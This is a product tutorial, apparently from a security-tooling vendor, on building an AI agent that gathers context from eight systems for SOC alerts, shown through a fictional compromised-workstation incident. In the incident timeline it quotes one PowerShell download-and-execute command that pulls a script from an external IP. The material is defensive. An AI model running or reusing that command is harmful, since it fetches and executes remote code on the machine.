Abstract red and blue flowing lines on black background

Security Tutorial

How to Build a Threat Investigation Agent (8 Systems, One Skill)

An alert fires at 2am. The agent queries 8 systems, builds a timeline, scores severity, and posts an enriched briefing to Slack. The analyst reads one message instead of opening 8 tabs.

Amodal TeamApril 5, 202625 min read

The problem: 20 minutes of tab-switching before you start investigating

A page fires at 2am. CrowdStrike shows a suspicious process on a workstation. The on-call SOC analyst opens PagerDuty, acknowledges the alert, then starts the context-gathering:

The 2am tab-switching ritual

1.CrowdStrike: what process, what host, what user, what detection?
2.Splunk: raw logs around the timestamp. Any related events? Lateral movement?
3.Okta: did this user authenticate recently? From where? Impossible travel?
4.Active Directory: is this user an admin? Service account? What groups?
5.VirusTotal: is this hash known malicious? This IP? This domain?
6.Jira: is there already a ticket for this host or user?
7.Slack #soc-alerts: has anyone else noticed this?
8.PagerDuty: who else is on call? Do we need to escalate?

20 minutes of copy-paste across 8 systems. Before the analyst even starts thinking about whether this is real. Half the time it's a false positive they've seen before.

The agent does this in 30 seconds. One message in Slack with context from all 8 systems, a timeline, a severity score, and a recommendation. The analyst reads and decides. Here's how to build it.

Part 1

Connect 8 systems

Each connection is one command. The agent gets access and understanding.

Initialize and connect

terminal — project setup

$ mkdir acme-soc && cd acme-soc

$ npx amodal init

✓ Project initialized

terminal — connect all 8 systems (~5 minutes)

$ amodal connect crowdstrike

Installing connection crowdstrike@1.2.0... ✓

CrowdStrike requires API key authentication.

? CrowdStrike Client ID: ********

? CrowdStrike Client Secret: ********

✓ Stored credentials in .env

Testing... GET /detects/queries/detects/v1 → 200 (47 detections)

Connected. 28 endpoints available.

# ... same flow for each ...

$ amodal connect splunk

✓ Connected. 34 endpoints available.

$ amodal connect okta

✓ Connected. 42 endpoints available.

$ amodal connect active-directory

✓ Connected. 18 endpoints available.

$ amodal connect virustotal

✓ Connected. 12 endpoints available.

$ amodal connect jira

✓ Connected. 38 endpoints available.

$ amodal connect slack

✓ Connected. 42 endpoints available.

$ amodal connect pagerduty

✓ Connected. 23 endpoints available.

What the agent now has access to

CrowdStrike

28 endpoints

Detections, hosts, processes

Splunk

34 endpoints

Log search, raw events

Okta

42 endpoints

Auth events, user profiles

Active Directory

18 endpoints

Users, groups, privileges

VirusTotal

12 endpoints

Hash, IP, domain reputation

Jira

38 endpoints

Tickets, known incidents

Slack

42 endpoints

Channel messages, search

PagerDuty

23 endpoints

Incidents, schedules, on-call

237 total endpoints. Each connection includes curated API docs, entity descriptions, and access rules.

Part 2

Write the investigation skill

Your SOC's methodology, encoded as markdown.

The investigation methodology

skills/threat-investigation/SKILL.md

# Skill: Threat Investigation

## Trigger

Activate when a security alert, detection, or suspicious

activity is reported. Also for ad-hoc investigation requests

("investigate user X", "what happened on host Y").

## Phase 1: Triage (parallel, <10 seconds)

Dispatch 4 parallel task agents:

- **Detection context:** Query CrowdStrike for the detection

details, severity, host, user, process tree.

- **Identity enrichment:** Query Okta for recent auth events

for this user. Check for impossible travel, unusual

location, MFA failures. Query AD for group memberships

and admin privileges.

- **Reputation check:** Query VirusTotal for any hashes,

IPs, or domains from the detection. Known malicious?

Known benign? First seen when?

- **Existing context:** Check Jira for open tickets on this

host or user. Search Slack #soc-alerts for mentions

in the last 24 hours. Check PagerDuty for active incidents.

## Phase 2: Correlate (<5 seconds)

Build a timeline from all sources. Look for:

- Auth events close to the detection timestamp

- Related detections on other hosts (lateral movement)

- Log entries matching the detection signature

- Prior alerts for this user/host in the last 30 days

## Phase 3: Score and Recommend

Severity scoring:

- Admin/service account + known malicious hash = CRITICAL

- Standard user + unknown hash = HIGH (investigate)

- Standard user + known benign hash = LOW (likely FP)

- Match to known false positive pattern = AUTO-CLOSE

Always present:

1. One-paragraph summary

2. Timeline of events (with timestamps)

3. Severity score with reasoning

4. Recommended action (investigate, escalate, close)

5. Which systems were queried and what was found

## Rules

- Never auto-close alerts. Recommend, don't act.

- Service accounts are always high priority regardless of hash.

- Check the false_positives knowledge base before scoring.

- If the user is a VIP (exec, board member), always escalate.

- Include the PagerDuty on-call name in every alert.

Parallel task agents

Phase 1 dispatches 4 task agents simultaneously. Each one queries a subset of systems, processes the raw API responses (sometimes 10-15KB of JSON), and returns a 200-500 token summary. The primary agent never sees the raw data. It gets clean summaries and focuses on correlation and scoring. Total context stays under 5K tokens even though 50K+ of raw data was processed.

Add the automation trigger

terminal

$ amodal install automation alert-enrichment

Installed alert-enrichment v1.0.0

Trigger: PagerDuty webhook → #soc-alerts

When PagerDuty fires, the automation triggers the threat-investigation skill automatically. The enriched briefing posts to #soc-alerts before the analyst even opens their laptop.

Part 3

2:14am: an alert fires

CrowdStrike detects a suspicious PowerShell execution on WORKSTATION-47.

The alert fires, the agent enriches

PagerDuty pages Sarah (on-call analyst). Before she opens her laptop, the agent has already posted to #soc-alerts:

#soc-alerts — 2:14 AM

PagerDuty 2:14 AM

ALERT: Suspicious PowerShell execution on WORKSTATION-47

Severity: High · Detection ID: DET-8847 · Assigned: Sarah Mitchell

Amodal 2:14 AM

Queried: CrowdStrike, Splunk, Okta, Active Directory, VirusTotal, Jira, Slack, PagerDuty (4 parallel task agents, 2.8s total)

SEVERITY: HIGHInvestigate immediately

Suspicious PowerShell execution on WORKSTATION-47 (user: marcus.chen@acme.com). The process downloaded and executed an unsigned binary from an external IP. Marcus is a standard user but has VPN access and access to the finance share. No matching false positive pattern. No prior alerts for this user.

Timeline

1:58 AM Marcus authenticated via Okta from IP 203.45.67.89 (Singapore)

1:59 AM VPN connection established from same IP

2:02 AM First login from Singapore for this user. Previous logins: SF Bay Area only.

2:08 AM PowerShell spawned: IEX(New-Object Net.WebClient).DownloadString('http://45.33.21.8/p.ps1')

2:09 AM Binary downloaded and executed: svchost_update.exe

2:12 AM Outbound connection to 45.33.21.8:443

2:14 AM CrowdStrike detection fired (DET-8847)

Enrichment

CrowdStrike

Process tree: outlook.exe → powershell.exe → svchost_update.exe. Unsigned binary. No prior detections on this host.

Okta

Login from Singapore at 1:58am. Previous 90 days: all logins from SF Bay Area. Impossible travel: SF login at 5pm yesterday.

VirusTotal

IP 45.33.21.8: 7/87 vendors flag as malicious. Associated with Cobalt Strike C2. Hash of svchost_update.exe: 12/72 detections.

Active Directory

Marcus: standard user. Groups: Finance-Read, VPN-Users. Not admin. No service accounts. Reports to Lisa Park (Finance).

Splunk

3 additional outbound connections to 45.33.21.8 in the last 4 minutes. DNS query for c2.malware-domain.net resolved to the same IP.

Jira / Slack / PagerDuty

No existing tickets for this host or user. No mentions in #soc-alerts. On-call: Sarah Mitchell (primary), Jake Torres (secondary).

Recommended actions

1. Isolate WORKSTATION-47 immediately (CrowdStrike network containment)
2. Disable Marcus's Okta account — credentials likely compromised (impossible travel + C2)
3. Check for lateral movement — Marcus has Finance-Read access, check if finance share was accessed
4. Block IP 45.33.21.8 at the firewall
5. Escalate to Jake Torres (secondary on-call) — this needs two analysts

30 seconds

8 systems. 237 endpoints available. The agent queried the relevant ones, built a timeline, correlated impossible travel with C2 indicators, checked for lateral movement indicators, and produced 5 specific recommendations. Sarah reads one Slack message instead of opening 8 browser tabs.

Part 4

Sarah investigates

The agent enriched. Now the analyst digs deeper.

Sarah asks follow-up questions

#soc-alerts — 2:16 AM

Sarah Mitchell 2:16 AM

@amodal did Marcus access the finance share after the compromise?

Amodal 2:16 AM

Queried: Splunk (file access logs for Marcus, 1:58am-2:14am)

No. No file access events on the finance share from Marcus after 1:58am. The last finance share access for Marcus was March 14 at 3:22pm (SF Bay Area).

However: the PowerShell script ran a net view \\finance-share command at 2:10am. It enumerated the share but didn't access files. Likely reconnaissance.

#soc-alerts — 2:18 AM

Sarah Mitchell 2:18 AM

@amodal any other hosts connecting to 45.33.21.8?

Amodal 2:18 AM

Queried: Splunk (firewall logs, DNS logs for 45.33.21.8, last 7 days)

Yes. One other host.

WORKSTATION-12 (user: sarah.kim@acme.com) made 2 DNS queries to c2.malware-domain.net on March 16 at 11:42am. No outbound connections followed. No CrowdStrike detection on that host.

This may be an earlier compromise attempt that didn't succeed, or a related phishing campaign. Recommend investigating WORKSTATION-12 as well.

Sarah Mitchell 2:19 AM

@amodal isolate WORKSTATION-47 now

Amodal 2:19 AM

Confirmation required

This will network-isolate WORKSTATION-47 via CrowdStrike. The host will lose all network connectivity except to the CrowdStrike cloud. Marcus will be unable to work.

Sarah Mitchell 2:19 AM

[Confirmed isolation]

Amodal 2:19 AM

✓ WORKSTATION-47 isolated via CrowdStrike. Network containment active.

Write operations require confirmation

The agent recommended isolation. But it didn't act unilaterally. It presented a confirmation dialog with the impact ("Marcus will be unable to work"). Sarah confirmed. The write went through. This is the guardrail system: reads are automatic, writes require human approval. The confirmation tier is set in the CrowdStrike connection's access.json.

Disable the compromised account

#soc-alerts — 2:21 AM

Sarah Mitchell 2:21 AM

@amodal disable Marcus's Okta account and revoke all sessions

Amodal 2:21 AM

Confirmation required (2 actions)

1. Suspend Okta user marcus.chen@acme.com (status: ACTIVE → SUSPENDED)

2. Clear all active sessions (3 sessions: VPN, Outlook Web, Salesforce)

Marcus will immediately lose access to all SSO-protected applications.

Sarah Mitchell 2:21 AM

[Confirmed both]

Amodal 2:22 AM

✓ Okta account suspended: marcus.chen@acme.com

✓ 3 sessions cleared (VPN, Outlook Web, Salesforce)

Escalate and page the second analyst

#soc-alerts — 2:23 AM

Sarah Mitchell 2:23 AM

@amodal this is big enough for two analysts. Page Jake and create an incident.

Amodal 2:23 AM

Confirmation required (3 actions)

1. Create PagerDuty incident: "Compromised credentials - Marcus Chen - C2 activity" (Severity: P1)

2. Page Jake Torres (secondary on-call) to the incident

3. Create Jira ticket SEC-1247 with full timeline and enrichment attached

Sarah Mitchell 2:23 AM

[Confirmed all]

Amodal 2:24 AM

✓ PagerDuty incident created: INC-892 (P1)

✓ Jake Torres paged — acknowledged at 2:25 AM

✓ Jira ticket SEC-1247 created with full enrichment

Jake joins and asks his own questions

#soc-alerts — 2:28 AM

Jake Torres 2:28 AM

@amodal I'm on. What's the status? Give me the 30-second version.

Amodal 2:28 AM

Status as of 2:28 AM:

✓ WORKSTATION-47 isolated (CrowdStrike containment)

✓ Marcus's Okta account suspended, sessions cleared

! WORKSTATION-12 (sarah.kim) had DNS queries to same C2 domain on March 16. Not yet investigated.

✗ IP 45.33.21.8 not yet blocked at firewall (requires NetOps)

✗ Finance share access audit not yet completed

Sarah is checking the finance share logs. Suggest you take WORKSTATION-12.

Jake Torres 2:29 AM

@amodal investigate WORKSTATION-12 and sarah.kim. Same depth as the original alert.

Amodal 2:29 AM

Queried: CrowdStrike, Splunk, Okta, AD, VirusTotal for WORKSTATION-12 / sarah.kim (4 parallel task agents, 3.1s)

SEVERITY: LOWLikely false positive

WORKSTATION-12: 2 DNS queries to c2.malware-domain.net on March 16 at 11:42am. No outbound connections followed. No suspicious processes. No CrowdStrike detections. Sarah's Okta activity is clean (all logins from SF office). The DNS queries came from a browser session visiting a compromised ad network. No payload delivered.

Recommend: add the ad network domain to the blocklist. No action needed on WORKSTATION-12.

Part 5

Containment and handoff

Wrap up the incident at 2:45 AM. Total time: 31 minutes.

Block the C2 IP and notify the manager

#soc-alerts — 2:35 AM

Sarah Mitchell 2:35 AM

@amodal finance share is clean. No files accessed. Can you draft a summary for my manager and the CISO?

Amodal 2:35 AM

Incident Summary for Leadership

Incident: Compromised credentials for marcus.chen@acme.com resulting in C2 activity on WORKSTATION-47

Detection: 2:14 AM via CrowdStrike (DET-8847)

Root cause: Likely phishing. Marcus authenticated from Singapore (impossible travel from SF). Attacker downloaded and executed Cobalt Strike beacon via PowerShell.

Impact: Finance share was enumerated (recon) but not accessed. No data exfiltration detected.

Containment: Host isolated, Okta account suspended, sessions cleared. Response time: 5 minutes from detection to containment.

Related: WORKSTATION-12 had DNS queries to the same C2 domain on March 16 (compromised ad network, no payload). Separate, lower-risk.

Remaining: Block IP 45.33.21.8 at firewall (NetOps ticket). Full forensic imaging of WORKSTATION-47. Password reset for Marcus after investigation complete.

Want me to post this to #security-leadership or send to specific people?

Reschedule on-call and close the loop

#soc-alerts — 2:40 AM

Sarah Mitchell 2:40 AM

@amodal Jake's been up for 30 minutes on a night he wasn't supposed to be on call. Can you check if anyone can cover his morning shift? He should get to sleep.

Amodal 2:40 AM

Queried: PagerDuty schedules, user availability

Jake's next shift: secondary on-call 8am-5pm today. Options:

1. Alex Chen is off today and was on-call last week (so he knows the current incidents). He's in the rotation next week anyway.

2. Dana Park is on primary for day shift. She could absorb secondary duties (her current load is 0 active incidents).

Recommend option 2 (Dana absorbs) since it doesn't require a swap. Want me to update the PagerDuty schedule?

Sarah Mitchell 2:41 AM

Option 2. Update PagerDuty and let Dana know.

Amodal 2:41 AM

Confirmation (2 actions)

1. Override PagerDuty: remove Jake from secondary 8am-5pm, assign Dana

2. DM Dana Park in Slack: "Hi Dana, you're covering secondary on-call 8am-5pm today. Jake was pulled into an overnight incident. Current active: INC-892 (contained, needs forensic follow-up)."

Sarah Mitchell 2:41 AM

[Confirmed both]

Amodal 2:42 AM

✓ PagerDuty schedule updated: Dana is secondary 8am-5pm

✓ DM sent to Dana Park with context

Close the incident window

#soc-alerts — 2:45 AM

Sarah Mitchell 2:45 AM

@amodal update Jira SEC-1247 with the full resolution. Add the executive summary. Set status to "Contained — pending forensics."

Amodal 2:45 AM

✓ SEC-1247 updated: status → "Contained — pending forensics"

✓ Full timeline, enrichment, containment actions, and executive summary attached

✓ Tagged: marcus.chen, WORKSTATION-47, WORKSTATION-12, 45.33.21.8

Incident duration: 31 minutes (detection to containment: 5 min, full investigation: 31 min). Systems queried: 8. Write actions: 7 (all human-confirmed). Estimated manual time for this investigation: 2-3 hours.

Part 6

The agent learns

This investigation makes every future investigation faster.

Knowledge proposals from the investigation

Admin UI → Knowledge Proposals

Proposed by agent · from INC-892 investigation

"IP 45.33.21.8 is associated with Cobalt Strike C2 infrastructure. Add to threat intel blocklist."

Proposed by agent

"DNS queries from browser sessions to c2.malware-domain.net without subsequent outbound connections are likely compromised ad network hits, not C2 callbacks. Score as LOW, not HIGH."

Proposed by agent

"When impossible travel is detected and the foreign login is followed by PowerShell execution within 15 minutes, severity should be CRITICAL regardless of user privilege level."

Every incident makes the next one faster

Three knowledge proposals from one incident. The C2 IP goes into the threat intel base (future alerts matching this IP get auto-correlated). The ad network pattern becomes a known false positive (future DNS-only hits auto-score as LOW). And the impossible-travel-plus-PowerShell pattern becomes a CRITICAL severity rule. Next time this happens, the agent's 30-second briefing will be even sharper.

Part 7

The SOC manager reviews

Next morning. Quality check, cost check, skill tuning.

Session replay: did the agent get it right?

Admin UI → Session Replay → INC-892 investigation